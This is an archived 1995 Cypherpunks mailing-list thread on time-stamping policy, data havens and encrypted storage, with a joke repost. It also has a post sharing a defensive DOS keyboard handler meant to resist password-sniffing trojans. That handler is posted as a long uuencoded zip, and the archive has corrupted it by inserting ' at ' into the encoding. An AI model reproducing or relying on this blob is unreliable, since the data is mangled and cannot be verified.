quite mean the same thing, n'est ce pas? Eric From eric at remailer.net Fri Jan 13 11:17:44 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 11:17:44 PST Subject: time stamping service (again) In-Reply-To: Message-ID: <199501131916.LAA02991@largo.remailer.net> From: sdw at lig.net (Stephen D. Williams) It should have minimize bandwidth, minimize cpu, minimize storage levels of service to allow different levels of users to have different possible impact on the machine. (Ie. : local, paying, regional, unknown, domain, etc.) This is the area of policy, for which there are no general purpose solutions that I know of. I see a need for a general purpose module that would accept authorization requests from various end-user services (remailing, timestamping, storage, etc.) and return yes or no. If money is part of the policy, this is the place to implement it. That said, I don't think the lack of a policy engine prevents a cypherware distribution from happening. Eric From eric at remailer.net Fri Jan 13 11:21:15 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 11:21:15 PST Subject: Data Havens..A consumer perspective In-Reply-To: Message-ID: <199501131919.LAA02994@largo.remailer.net> From: Nesta Stubbs are you saying that there is an agreement between the data haven operator and the user? There's always an agreement, implicit or explicit. Right now were are getting into so many fraggin different definitions of data haven, that this conversation is loopng over itself infinetly. Well, the 'data haven' that started the topic of discussion was a misnomer; it's really an off-site storage facility. I don't know about the rest of the list, but I'm more concerned with discussing working code. Eric From hayden at krypton.mankato.msus.edu Fri Jan 13 11:24:37 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Fri, 13 Jan 95 11:24:37 PST Subject: Amusing thing that might interest Message-ID: I thought that this might amuse: -------------------- Newsgroups: rec.humor.funny From: scotta at kije.gsfc.nasa.gov (Scott Austin) Subject: Information Superhighway: The Real Scoop As seen in "Abort, Retry, Fail?", by Don Willmont, from the July '94 PC Magazine. ------------------------- Renaming the Info Highway ------------------------- We asked you to help us rename the Information Highway, and boy, did you ever! [runner-up info deleted] The winner is Kevin Kwaku, who suggested that while the Information Superhighway is a bad name, it could be a great acronym, standing for "Interactive Network For Organizing, Retrieving, Manipulating, Accessing, And Transferring Information On National Systems, Unleasing Practically Every Rebellious Human Intelligence, Gratifying Hackers, Wiseacres, And Yahoos." Scott Austin scott_austin at cnt.com -- Selected by Maddi Hausmann Sojourner. MAIL your joke to funny at clarinet.com. Attribute the joke's source if at all possible. A Daemon will auto-reply. Remember: Always give your jokes a descriptive "Subject:" line. Don't use "joke" or "submission" or "joke submission," please. From Ben.Goren at asu.edu Fri Jan 13 11:27:56 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Fri, 13 Jan 95 11:27:56 PST Subject: How do I know if its encrypted? Message-ID: At 10:52 AM 1/13/95, Eric Hughes wrote: > From: Ben.Goren at asu.edu > > Here's a solution: > >What problem, pray tell, does this solve? That of the data haven operator being able to deny knowledge of the contents of files people send him. He'll only return files that, when operated on by a strong cryptographic algorithm, make sense. He therefore can't look inside the files until the owner asks for them back. If he operates a timely (and automated) service, he can't know the contents until after he's already sent the file back. If the server automatically deletes the file upon return, he can't even tell what's in it then. Further, an "authority" won't gain anything by seizing the data. >It seems far more >complicated than it need be. As best I can tell, none of the previous suggestions guarantees that the file is unreadable. How would you accomplish that in a simpler manner? Or would you, as the operator of a data haven, not mind the risk of somebody designing an illegal file that passes all your filters and tipping off the police that you've got such a file on your computer, available to all--for sale, even? If there were a weakness in your filter, somebody could easily exploit that weakness and get the use of your haven. With my system, they could send you anything they liked, but it'd be little more than a cash donation, as they'd never get it back. Your liability would be the same as if the person had just emailed you the file and blew the whistle. > Alice sends a file to Dave's DataHaven. When Alice wants her file back, she > sends to Dave a secure hash of the file, a key with which to decrypt it, > and a handful of plaintext at the beginning of the file. Dave decrypts the > file that matches the hash with the key Alice gave him; if the file begins > as Alice says it should, Dave returns the file to Alice. > >Eric b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5. From rrothenb at libws4.ic.sunysb.edu Fri Jan 13 12:34:44 1995 From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg) Date: Fri, 13 Jan 95 12:34:44 PST Subject: Keyboard sniffing in DOS Message-ID: <9501132033.AA17462@toad.com> wrote: : For Dos operating systems. [..] : But, here it is, the source code for a keyboard sniffer program. [..] : Then, test it out with pgp or other dos based programs that ask : you for a password (use a fake one), and you will probably see : how insecure most of these programs are. : Mike I've thought about that problem too for terminal as well as crypto, (after seeing an article in 2600 about sniffing a roommate's passwords to the "K00L EL1T3 B0ARDZ") and started on a small "secure" keyboard handler. Here it is, though in very incomplete form. It ignores Pause, Cntl- Break and PrintScreen and doesn't make an annoying noise when the buffer is full, and may not work entirely for enhanced keyboards (since I do not own one to test it on). There's plenty of room for improvement in this, I'm sure... It does have some features like random-noise sampling, "SuperKey" codes and multiple keypress maps (as well as an option to hook into Interrupt 0x16 if security isn't a pariority). The interface is in Turbo Pascal because I haven't made the migration to C yet (don't flame). Any help with fix-ups, improvements a C- interface and constructive suggestions would be appreciated. I've tested it with KeyTrap and it *seems* safe from such monitoring trojans.... Rob PGP Key ID = 0xab1f4831 begin 644 kbisr132.zip M4$L#!!0``@`(`'6EN9YU<6W/;R)5^ M'M;R/W3IQ5(5S8F=S65&J511$F4SD2B%I.SH+2#9%!&#`!<-2.:_W^]?#/Y\&C^93\/Q<#*X,X]/5W>C:X/_AN/IL-OY MB9_`GR^V=&F1FX\]\[ND\V\3)S=*%S9TURV)1;VQ>]0Q>,(MUDK^D^8M)*Z*? M%Y5)LJQXL\L^;?PG$SVR(55?C M.5HV[`AKT,.\5T@'7#I3.^A*GX210LIM[HQG+MEN,YP"+<\RXK.P;:7I=AJM M>>:\H23?F0(OE69;%B]ELC%OZX)(U]6Z*!TDM8%&X,ENIW9RD.#J?%IL MK+YW2D5;^UL4T!R(<+[K=KS([])YF90[XJFRS[%\8\%[59)#GO=V>4 M'3X`9=KA((NB+_KS=6US\P;Y;FWRC63"PO7<]. at KXJJT*UN6M"6(00^R1QK: M[6Q+\(!M/F"%X]RY`S6,SS:I2#VZG77R*D<=Z4ED3&)#!QR:<]6B\H5U at B0& M$4(A7K&X25=$W+RE;GW1"XMA.PN;OA*5NEP0[24.J&2QO5 at 8'[;EWX0"X^?H M77I(M;:EF'@?>FC`Y4+X9"JYR>V;L.S%?RGJY.E]RXNW0'A9$%%'I"%LIX11$M+XEJ00CE9`!*9I\MN!YI+7HM$:G,V?EU'2!'S MI-_NFWQ5T.&49, at E;U*>`C:FU#FS<94G%U!>VK!)L&D]L\64Z3[.T2M4U M$6D1:[=S]&1C>?:()SV$3;%,5Z3+*H];?&6_)YMMAL?TF:,$7;U8F\1+'@); M6S+#;@<_5BEOF_V(65E0XJ5JN(:75%41>I*"5 at X)D:]I1,'29;,RI+=],3M^ M>4^W\& MUBED2Y)R_&5F7V#X'!,=QVT-BKW668/JSQRD^$#C%97S0>8@*3H4F]#9L6>% M*];M$&&R'FQ*])_MT^N_:A_Y`$C>^EA=DQZ["N^Y<";B:?,"!$H*4CM>DW?8 MCD4XD='J(`3Q!E+VT?A\8VD9FSF)%%L@"7Q%P.,-E-2%N%B;P+$>'MAY\WK" MNN1#/RU9X&32/,EZ6$1W13$(P@``V'"T+8MEO1!&.,30*4-5B0*<=D8J0(<1 M$8,WD'CU#D]LZXH#D-><6WHBV_5XG=AM$5O5&M@#\1W+`1201"N$&!:!CY]; M^KZB8`P=)+?+?N6U2)?,PY+\9BG;1HCSBD'!$^::J.Q#=*6=I/DR?4V7-;%E MBCF[%UDE`!\X@=Q8Z.F"S8_#U#JB@[\1I6R%`-I7;PKE(,7!>;,:L>`WR9)0 MCUED-E$>(06_)S'(>8!;2]%25;)W"DLH!.!C$G]X+F$C3_US,UH.IN,KI[H*W[P_N%F=#NZ'M`'LH7?]1EI M'4-6JITL=>Q#0,];47Y3?T%8$@<(E):0C"A$;[-$]9<4I'%'ZR*C\..2G4+B M#5`KQ-]X$TBC#B%*9.D!]G$@TA?QGST*AV>`W1;R at XMB?!-VP&$CV at 9M@#TB M-/2,=S-/Q,)Y:4\.AV,1"XU->=O15T2$"(/9]!5'!V5C,L)^L^?M5[3QE M;K![+"P/J^Q4NUNDS;8H62$8=F`_RD+(0&@3Y/QC[7'>&X<(OB2'0B(H)$IF ML-8Z>2&YG7^&RX1O6$'.O?`&+&"S<>8,D>6,#6<`W_\J4*)0Z1(..V4GK8TR_&2LVB!K M41/5BTOQOHSBZLJE[`809D'>ZTQ"?G0%1:GS at Q-0A^U1D5WV%.$Q.7A8N(9B M$[\"8-C`_"(GG+[B)>F,.4"P?TTKCIGF0.6Z';_V.=RCW1)2RSFE at 2,C]N86 ML)[]&;9ZA.<+"/6K@"$3U*VL":43,4?K^+`4]KDLK`\3'_H">)+=;\E\/;93 M0N]<"_/00<>@G-!VFK.];!`B:N`VV")"@%U&Z0():)LNZJ)VF:P/-\1^'HJ, M3[9D^0 at _V`@C"64S?HJ(>,M39Z3[6&1)NH%HP+?'!Y?FF[5;,A!2!46#W8Z\ MYWQ$(ZA$:7;+/4KR2`)(YL[F6(9B';87:!-`7PKL;'+,""ZTY0>-X-UX9Z<+ M at 4A6X)@%Y36/\Y&%TY),B1&O0AZXX/7.P58RU7(Q;Y_PR6(*"'=*)E%@66S5 M[=#&`Y2*P!H%YN\^R?=06Y7H8Z-$"@B9INRM/*X[WI.JP^MVQ./AD9I#YT98 M/NFD>QIN16=;V)2]?MM!JN\W1\+,5#?X`6*?%U0V.E!2:`F0^L9:T1?9B+-1 ML/]5!&%,]GRCGK`0X1<9KA^AR4)(#>7]B"3CRC17EJAZ52X1C4OR(9Q>@K^4(D!)9P-(1>JM MJI7G10VG0W5&C=1L(RU7:(YZPD0HZ">G4Z=S`L+(?GH>K05%49M03L(;%TT) MA&MW[`.B?$#4WXN<3TU([!N01EJ;93[`$3W#67-A7E/[MN6 MG=BO%(-;8;UR-EOYHJ8_"'`G-"@:**'.2X9$PHJF1$V>`3>MA9&"-I'*W@/#S< M0-2OE,A59!:Q3 M:`4#3OB33209O,[>B/-4\3J2TZ2N%7`0DO8B#CO<&*!J2!,B/JW4M[QCTD)F MD()4FIOZBB2*@A0\?D;J\9W*[ZH!2`-PPJ4NY$%IS8%$JBOX@!-8V5EI7Y)R MB3#!:H"7S!L%2%B>LB9,LA<2S3%2W2VRFKH(*\J<75642,O4VS>;%+C<>*9YZ;UBQ)]Z4U9P2G!.!,'? M_QCA[V]C?P>NH'O"%'!8H?`$>-1.TM\5'K*2Y`KM at D90ISJ'VYJ:E! M4D at 2Y'8).?8B]':XNR08&`/UGGE-LE0(0G(9_';%M3W=V\XF)3>)FHR$L11[ MB5U/<;R"K9S::5+LSK6IR`A*6VP^M:#P:$L/T%5ZL?+V.%#+"0B)?<%'<7S_ MC%JGP2A18_1O.XK3IZ";^7\=Q>*4HJ4YR4&\1Y3X,J#5V,WGI`AAKPUV8M^$ M9;@JEV1@)Q<_Y_&.MI&EU+#B^F1.R)5<*-*^@^J)+TEP5"0"@<48E_UG:^8M M-X`V"0I(^3UD4TK)R$SKN0\=NDRWTN%>1>Y2A M?!1@.>7_4HM4TI#3G#.7;H>.ZZ(QBTWR;\8)&V at WH]ESV20Q_0TJ;3.! M,(X<_(5N$F at +?D7R7K=S%7`>EZ[((;=E0$D61%OG#'"8Z[`6T+"`_40-ELO9 M;1$R$E@=H(IH`<)CD3U0FT at K<*SU8!%B6RQX>9T8842=:&^2"O4#>&-[8-I02M25=MM^W M5"_F]$OQ@/?T$::AMBI5K:`?6^R`X=`;H\?B)`.GUV>_2CTM44AN4R4UA8A* M8QV%F)0.M-5_/<)8MQ,,T\N9@#?WHX+3E4H8"\2W_OF8*7@$.!=5'$,'T,]4 MI&4S)!188TOBTZ+,B)VT9P'Y)+79\+]5G8FSR=($Z:>"PS_($?K\,,Y823VW MU5X*YU*J>OINN6B13H.P%PXR("#-"D^]U!>J%4AMN-U7UFHA.?<3!T0EILKM M]UMD1HBRYL0G=:6T"=?I/*VD,9`E;V&F0%/-PRT)(02>@GKE-*@C/!'O+52^ MURHXU_+EZ8K^A52+J.NY"/HC'"1:.FZ==<6(EYKF7,_T(U'_E]:B\!PV(+G! M8[O]Y6)HKUKPQ[ZT;ZIT8Q7(_"A#^$_;;@U<[-F3F@)EVMXZO:.#-6MC6[^2 M61:QZG:A,AH[\)S!W-E!5=Q?MR>:LGZ^0UU6BK"A==%574JOK#43HRE<4\%_ M9T*^JDY770+K.,2QYO9:7PKUC5WI%(W@*:3'^/\%G5=CD=K+BORT;.4 at H?M3 MWXQ6$OZY/@.;#;T(BA!E9?Y=+U^X3"A@)LIPI05.\TPK"DC6/[72 at _4="ZH` MF7/I?F]2G8W4_CGLM[;NHL<@QJLD`V at 6)ZL$:=&Y3NG0SH0OX$1&+DBZ_++BZ+0)B`T0Y1<>&TT.E4O]T7L*#PZ.DN&Z M5](3IJC#"(=#5$DXY##B4]29H#X9=35EL4-VL7O/DPZ1L4=8PB]#+E%PX0A)^0AC+TP%9DE^*-."'1L552"O#E93R'H`AN2W4K MCH+\V-RR0XVIA_-TX(.USQ]#\<_%;5!]@9P=00T M-]K/CQ>63NZH5_EUHLD0;3'BT;<9_;@/;?VE5)I^DK3)TUN' M+;E"+Y1P\399`GD7 at 0%;F1SQMK#E^C^)S9A[/D];X/EF<*C;>:&9$QBZ>")= M*&3T;S154'(?E`83#YBBPK%7?O9GFLWP,*6Z^B*7RKIC?\IC-XLHXZ.)1'GK M4LNT]39TGGGDZ^=EDP at Y"@1H51T"NY[#QD$IFS(< M$P8YO'/42"D.>EVDBB!G>U84*RU/\A&SM!#U$G@:ZTVSS#ED85_5'N;V,)9) MW'75D;(F9Q]_[OO6WG[5XV>=X-WS9*F+)CNX7^&'7#FM*LF9:8I+:M/8PGS7 M=-7B?%_<=P1;#F:>R%URYN9:G!RF#^+MD^52:ABD#SCX%TO/;]?%LLYN>S)I':ZA%U2S,RE+[9( M)/Y&;AJI00&3IK:,$VB:OU+GZ=U3H[9D[C\9$AI M7U-N(\O1TYSVJ]PY<3Q6P*/WQ\?M!2 at 0["7SPM_8XI3V%Q-A8V(E!0Q(R?&# M?[=-2Y[)]Z4K1Z:LK\@U$.(1.)4F*O#"TD+7,G'_,AK%BX014&FM0"5UA),1 MN=*C,Z,2+M4SZ2QQVC5V3@[3/Y'7F[DMFR'7D&%S at 6C%>?_>PPDP5R7/?S(TVA/BK1MD%XF&KS/4K/5E'Z48;66OZ at F^'" M6RYQ']&+ at _TW/121P^Z8%/9;=+LP8U/X],"_0]GM<7Z.WCWQ4U:_ZWNTZ4=I M(VMA2'$P'\,3?.*:6\.T3CN(+9O>`^*B==RO)I.S[>#!08&N"!#H;Q)RA9(A M1(2F:.S\_M,!["UXRGXO^:I*L;%DQ,-DN_B.U_C!?!U,)H/Q[%DUX4/?7`VO!T_3H9E]'IK'R<.G MR>#>C*9^O/?&W$Z&0_-P:ZX_#R:?ACUZ;C*D)UK4:- at WHH#''OCGX3]GP_', M/`XG]Z/9#.2NGLW@\1'4!U=W0W,W^`JA#O]Y/7RG3_5"%/IVQD.[NS'AX#8X'DVS/W at 66;-GU5/B-4PC=Y6#VA'HZB#JP<2Q!4X&C%C8(6D M0B=U,[@??!I.L>V@#;RXCLCWS/1Q>#VB?^![*"'._$Y$`Y/ZQQ.=)CY0*F:` M8^7=D4KJT9%%DM:-O;)@]7TK/6\6W]-$5I"[ARGI'9:9#0PSC;^OAO3X9#B& MS-BV!M?73Q/8&3U!;X"?Z1,L;S3FD^EV:,]LW*/)C;J8$:W6.SZLYZA:1GQL_F,\[@:XK'!S9<1N2)9"&3` MYTCE\J`D5)CJ[OCZ+3;)KQRYG"!7&P9;&B%*O_]*E6(*$@/.;*66.V.L@`^? MR2./`8XT%CK1:HV at 2\3 at K-@BD"M^:L9!HXM^.F.H0?6%[[O0U`K2&*G#U2Y$ M*4D1-8.GE(,*%%P"7U..(B!)YO at Y4-&%P';`D%@9+BK1(%6KAAK=D`WM:U^B M;.X&^OIO527:]6K`5)A/+N+6+>$=3J=@B5>[T[X9H+]3:->,4//`$=%B(F[-%1H&@WX.03*`LX`=SI`- MY%H4,]N"DR@>&^(Y1-YK+Z.M4Z]\MPW[-U MV@*;F_MQ. at 5:'1];/785NYDY=RVTV/Q54@&OWW_$#H\8=-N<#U]?(/G0B[2# MJ^G#'9#)W7.,L"]9&U013+6#=O^+;_&^O>M'1K'O$II`Q''!9K00B7?/0P@) MO3<6ZE`^B[N,%UR\BUGI^WF:]6Y+Z2%WUIKQ=<\CLQ'>5]WUMY#;EV=:Z>?) M"WP":^MH4 M(/I^`1Z^<6UD8_,:8K,;]_X]^71.Q%V=2E\Y_$Z$<$=&=\R3A'1!FQ^R<"O% M#B^>^]\*$":J]?V-+2^,7'&'TCBJ`&325,SIJ+.!Z5 MI/!;.?TB`2=W5C_KU'U"8QW;#!&$Q[SX)5)9?Y/DN=@5RUUNO9E3E)SOPEHR MN]3PP!9#R$6=\=97?XSY5Z3U[Z at GQR..L$\G]YN=T0$:&M!Q%Z%&A]7^1 at R9 MS\GBFRW5%?Y%YEOH5CP49K:#Z17Y7WOF`Y!&;NHA+K$94&=Q?&9:CWQN1]04H\Q9L? M`>_Z2T)'?#@+@??37 at QPIFOXO4$L#!!0``@`(`'D!+AXM15L&%`H` M``48```+````:V5Y:&%N9"YT>'2-6&M3&[D2_;Y5^Q]4?`E4[%D at N\GF<:EK M#"2^`[HU,S80PW7E`;;4<[K[].EN"_%5 MK;Y(DR4]7XC[@^1-"/^(TTEW4HR4$)686&=2*414R52:X),@\K$O99"=0NI;X57*9'-OOXN#-X;N.&`=K5N+867O7$<.;CC at X>/=^7UR/ M>\G//Y&%-^F<-&'U at 3[]U];7V at _M1>GLW,E"X,>94TIX M.PM+Z=1'L;(5^^=4IGUP>EH%)72 at Q_T"\(7-]&Q%=O!>93+E!%P50;G""SOC M7SX/K\5G9923N;BJIKE.UZ#Q:'K'+Q"U*=NA&V>$85QC$&<6AF70UGP42N-S M)^Z5\_A='#;/J`UV**!D91>!!'0G;$D7]X!W)7(9UG?K\#UV?^UE)K1AVPM; MPJ,%+,+'I3+Y?5$](8WXEMO-.H-)S`3Q8N3D?]+[C2.QZ<#R8WY,398#(\'8_%V>5(],15;S09 M]*_/>R-Q=3VZNAR?)D*,%<%29."9$,\X2PACI@(8YFN_;Y!7#W!Y)A;R7B&_ MJ=+W@";!XW+UA9\+8T!%+IT&78)]FE:ZO$]L1`Y,F M'?'VW6_B0GHO>O?(95\64Z>S.7Z\Z(G]PX,W[SL;S/^CTNE=%T3LGFB'6)[8 MM"H4:I`LOL#^)Q6`/];D*[@/)X(-*^1\`=NYG5E7?X9W9Y5)B6S\7$:%W"P9*IZE MOI<*-.G`\U`Y0R at D4FJZ_RAGQ;W,*T6%0MY"81S3E at S-B1@P1/=3-L`7<)1< M0BQAB,E#?*2GUJX,9N+V]LOEY=?!<'+PEL5,S9`+2C-("S(5D4>Q08(]F6\B M2V9(/,G.BBC`[X)8#.^RC3FZE;E8`/Y&0%+"LJTR(I97H'H+XIHCKKF at ZI"*6-=7!P`N:YP3G[MS2H M[IJG at UUA_*BU4ZIARSLDIK378/&*P=9Z);6A;9AJ@*#(F'>B=[O MB"G.UG,#F6$W8FYU5`U.T;I at O2ZJ/$A#?*>XE!0%*G^GV`]`WR5-8;&C&68. M#KZ5;BCFC:P3E0S*49:U*(?N4+1?MPB=TD%:*#"\(1!_'#_-7F][ISP MC-Q5Q*[--L?,I=9,\@W#-:IC-:/1)K86%EBSJI/>%`,`4(VTM=T`[HB2^U&L M;)[<00H0VT$ZT#,E*Q=);%9%_5%1XDEST,2%RKWBL2"CEA[Q#"U&`Z)8WX)M M!`!*<\+Y\2]/),U`_P][?BP>O4R&G>NA&DFZL0><@MDB+]^SYNO4;B MTP4],2%C/WZ-,0N`96*&UCY=,>@9V^FP3J/7T,Q`:8VZN-V2;*=G0H!1`171 M`&"64DDV.:419+LI3!V*G&Q'B]O;\?75Z0B4?A((&-\95VB;H.V.^-3+PU$7 MM4I2.(6^<^X[=;?8_L1"08DW7.`RX1Y%SK#53Y\=''A]U&P6/W[%H[\>18F- M1(B-(4(SQHC>N#\8U`"[SP0T\K9I<='R^7BA9]%.&YO^<'(^O+ZXZIT\CMTB"6M?WKRP*^JY!:\*71K.0.L/]=4 at .;E MVZ'XVE(=93J\XH51K8/-#M8:W'G&5+U]Q$C&P7^]@2!D3Y`^1\=:<'2ADK^: M4&RTFD?<0]3OE"JIJG;0 at 79(6#;:#\6)-*L.[+:G1I;FN5VV6^7CV8\:IR[C MYO1,.34=M:5:[*`4B%CI/`V at 5>[6K7!+&.H!Y=%,PCORP][)G;.9L6YO3RZ' MDY/3_N7)Z=K8!60GU",*S1ZQOS^(:B+&;="VHV+FQK448P`=CG-V:7E!K6<= M;(25>B;8$>CU^'0T/#D>3,;K3U!3=2TA^)C<-N?%3T?[4#L9BX2C_`).+XG, MOIF1@!!;`=@1^T]#C#A);3>U'C#;NIR,1T\)A'83N^.CM:W94"G\M-](@>O/ M\(=)PALD5B_+ at Z57O+A1VU#WFB:W9CN.7^?\^$58-KYHRJU$MB`0&`\DJ$SO M;7+R12JJM3"ME[X?IBZTL6AF>%*!C*B"W3>(_>\';[<_KKFS4;DL&(H5EI(-'4R`&;;QI<+=2,#!VV2SU32]HHU;^^W"CU_\W=J#!SB_P%02P,$%``"``@` M$9TM'O<.?I*W!0```#````L```!T<&%S8V%L+G1AL M@&S8,RC)X>,U=>*'AGZHI'WTX((;U>#^0GRNHG(9:N`['VB=7KZI9. M at .@ZZ>YC_Z,MR$PD+D=5[F&3IGLC&< M,3\)8P:O&1HIBMYX`>)L>!['$759'X8N[Q=@[]@=@8,Q]:]>QCR#5X"HQV0: MT0EEB2L'W$D9.D?5F1OUX>;Q4;JESK%W"9_OI&$^^DYJ%M"[.Y0%G=V=1S^F ML#@4](I>?\L0<,OYUXEAJ/-/3&)8I"O/OV7I]?G?VOE_*YW@#;VNA@`_1M_? MW0$X=5EP at N[OA']3.`#3Z#]PA,BA;V<3J=SS,!$VO(]Y4)GL3YHLU'\6!-R& MDUAM\A[#S<*"VXDX7]K[NFDW&^#_$\AJ^2KAZ!<)%^D\_G@$+D[DSW. at AT!_7!IW+L*6-[\H M0Z(E9%R$W"PQV7HL4*W'Y.6&(:LC9,O'5C?=QYA75EPJ)3-1MME/2^-2T48# MJW"OWBNZ@$^#&:?@C.-/^+9/.,47*;#SH\OEN(&-F4FE2H`3&SXXZ?N6S'04,H4`^V`UY2CL>QXF](@5OS>TO86/[8&,1?$$IC@&5$S2FF7L.T'A MZ1_"/X0DQM05KB+4=TZGU$U=`8;H"Y=2'2)'X+Z"1K&0::8H]+FCP*+$DC&!P\(NQOZ+I MPOP%RX5#8'%2+CG2>9,Q904[,#P"5&XI3*$P1I7PW*$B*9Y&:*I\WE3RX:\0 M3/EB+`W@^&JY`RD5/UATO$X57"EJEOV;%<4ZLZPJ^@W5M(\41C at ANB#B)J+3 MR7>0BMI'27$ENF?FO-LF[B MJFTVH%8-5'/#GR3^/S3_TWOY[_^FT24I_R-U_-\F_Y-!K,K_BHFA'"S2\)/S M at KS4S+MD(3P8\P8X8C%6)\CI<0:,A2* M`,!BQ0Z16R`I3+.R1`CQ95*FJ2%ZISA7HB+)1,FXXS:>'I-BU:4A> MUC<&Q?H]E1?4;SCGY**)M at ZHSU620\HLEU#,/:.'A6J;!5IG$ M at 18,E at _3=U/@0;JYB0N6N=Y?\0R2ZRD-;-C36H-X>MUPVGI;<;C<3,UF2]LK M*W&2N!<,0DQGZ$.>A.Z+XTI(99ZD-:E96L[*?4V8>Y0_,_XBE6^GOOX:Y M;UJ*_W5)??^_/?[W#IW@>^-__YF699NJ_P?@UO/_T/6_)6M^=?Z[.C&-^O[G M`>I_>5JJ]7\Q,-37/_7USV:>I*YRG-E4^"$G5)+G[PD4.\K_#IT?..!PF MAXPQ5?DB281XF/;ALP[`O[[SJ5S!+.C7 at E&MI5)K1I7+<+1ZJ?SP`^2<```#P```,````:V)I"%!$@0I-^G-S42=QK8`+':!?<<"MW,W"IM6M/KI^WU: MK=;AX2'!G_#)_VSM[K:/2.O at J'5PN-_>/VB15KO=.MB']I_^@<\FBJT04/D& M1&:(^W_RZ8TO+@:C&?GK^;.W;\FY:U,_HL3R'?)R%/BO/EEA:/GQ(QGZBR!< M6;$;^.1M]>?YL^?/")DMW8BLP^`FM%8$?EV$E)(H6,3W5DB/R6.P(;;EDY`Z M;A2'[GP34^+&./M_!R%9!8Z[>$0X\-W&=VA(XB4E,0U7$0D6[(_WHRORGOHT MM#QRN9E[KIW2`%/C-]&2.F3.X."(,\1A*G`@9P$`9E0=$^I">TCN:!@AE;MR M#@&P00`GA/+2BA'UD`1K'/@*\'TDGA6G8YMZ\E,J'>+Z#/8R6`-%2X`(--Z[ MGD?FE&PBNMAX#00!GS#^&I&NJ//Y%-W,NF.9I^/H7.\#*"5WE$.REVM M/1<@W\LM"Q8(X6(PZ7V`(=W3X?EP]AF).!O.1H/IE)R-)Z1++KN3V;!W==Z= MD,NKR>5X.F at 2,J6(%D4`AB5>L%V"971H;+E>).C^#/L:`7*>0Y;6'87]M:E[ M!ZA9Q`[6C]5[AT`L+_!O&)70.5W'8^(NB!_$#7(?NL`N<5#<51R>;FP#>-=N M-LCAT0&YL**(=.]@+WO6:AZZS at W\>M$EK=WVWIL&N9IVFSCX^;._R%LRC8$1 MK=`A'^"G![O;IPO7IU$=_L_+PO'U]?3J: MNPW\;AZ at 7NU;L44FU'+`O9A.R,OV'OFWY6^L\)&TW[PY>,6,K?V*],!HA.[- M,L:O]W>PC4R".0UC^`':WY]OPAORR?)N7?]F9WSOR=EG8!FL#=C)D/D98%KM MP(\M&PWPG6L1NK,"LT7`^OXQ^ MV1PW3X,'TM[;/6J`H0C``S at -@^"V04:?&Z3=/GK3DM:$(V+YMQ$8JP[7B'WK MSG7(QR"VH8'\[-SRWT[6R\?(M:/F)@Y"P#1HVM8OS,HNJ;?FQO`<-'L4X\#N`6[@/U'G5$=B1 M@'0=M-5 at YF`TVN>>'WL[IR&U@*+I8S2A?S;X=UTOWNE3KT$NK0WZ1-.ENXAW M+L-X:@ME_SN8;B^X9VA#%YPZHFLK!`?)>P1/`6THVFSA44&S#0/`(0('*MRL MX^A=8C68AR2,K\W\"?`";`HVG$T8JH`78;`"2Q^#)@$7DP0^3<#PH0P7`'@Z MOAKU83KPQ38V. at C-9I-\*5D'ZL-?-BS:K61:.W!H](Z\'!(G\%_$W,,)?.Z) MT"AFN_2J!%P"!4 at -0MBN;N]C at TP&T\&HWR"SX<4`'+T&H;$-2$D at 8^9F(GPD MX70XGG+)Z<+V-)#6[!(M-CXC"QU at B\Q`L)`9Q&(`!T0P9$7)30#N->6+___;>W at 7TPS=X#U-Z&-ZBR";:8HG1%=S3U8F6ACHTZ#;0DX.VSWX`F%.#EK54.P$NX*85.MFR MD]PJ'22J=)H[@JI'2USFRR",T3_)+_$N+F^.V8;)SH$LQ6$`&@A&,ZZ9 M.ZWBQA]J8&1]6&6\@D0ROFT8KT$A)30%L6\`(?IS""!WU*-61$_=.(O&:PT9 M<^ATQ*3O+6XU:&LVUD$XR#[7$^;?9B>M8X&):/Y8#8:N^F&#\'8AK$6 M>S&:#>?=&/TS%G8X^J2.7)-DHQ.H*B.A!Y(R!+(9:)'Q(A5)57(+&G]XAKJ> MD#3)Q43F^ASX9NI9T5)5#@>H&2Y#L$U<:WMII)(/'+0J M^)EWV\$)2`N[WX/U!SQC%D5D8;4K1"P'JYV'I3=H0__,NWX-NH"-R\_03J;` M&2+TQQ$8^84L(@%;BUL1D1VZG]$IO%Z$-G% M]&&;MXU]6FS;Y6VS^Z#8ML?;INY#L>V(M_4YKV3;T"8Q9/[<6."UW/AJHR,: M9]:\"'4A&L_CT]"R;VFL9E,M"19Y/)]JM9.1J7)+&N6:G9G2=SKE96;LZ]/=$H1V4:#T3C1#/GWJ%H].)4 M]2:-K^6WH^[.DA=:?3JPL!PHXZ!`%6]W2 at YV@\^S`%91?\ M,=>WO8V#>49 at RZ@`HA1F-[)==S;WFA#N\@W>D7O)$FQ+"N8?%;6K[#IY&=)X M$_H1\;\V,9 at 3C=1Y1;(J.K\8"="=%*.M- MM%P4O[8]M_CE*KCCB__0P!\[[7P7$0[5F/S^-)WUR.9LPKOD=;/`NN/5?&MII_A!6;_IA M/)F1DW,KMI>5R-C1-I,?ED\NM-[)*-!./#B?#O3[R07$C.C>0>N-AA8(J-E/ M"*X-^^\VR-RP*Q&TVX;Y'=C8R#6/%UL*7'1]886W-"SO;@,YRM;OF,9$FWE" M at JTA(:1K*C8LFC]A3[A:%*S2D5]C3H8+#K:)L1TM]S@/1:&2"KM4J-;!FN at W M72)4'+#0$1\7M0=`N-1HLWL7%BK)I,\WBP78P=H.IUFCJFJD/Q[-^@.M44BZ M75]?308.!-P322C)#*K_1H$S[5>F8.6Z,8$>9*#$S8RX19E2!;.:33[": M,.@\"-:=%%:B+<`N_CY_*-$38*X$GL4V+^"T[NOQ1[R_1JRB8ZB_F5*\AA-)2.C-I+D=E4LJOX3$ZH MIG$KW88Z?D/&'O^>R?5^JP:ML><`9NW#WUAF_;]VOZ"C_:2Q7\SN`D-[5X]VQN6L\BDT MQC,'(744&7JBIFR+U2JH$O9%'?YE#A>PQPV>LN`)^1L\!\94YI:;5>Y=HJ4J MNL(PIQ-LYA[E$78.NRO?'8%H^"!@$_O*YDE%Y6ERUTE M+52M>LB72+ MGJS]8XV?(M,HN+E9Z>X\U2KDU:*T"ED!).2\>SHX1^K9LO$\\?V2AKR:,0C= M&]>W/%F%XFJ0Z(N[`"_?O6#@E[,N`$+4QR$X5 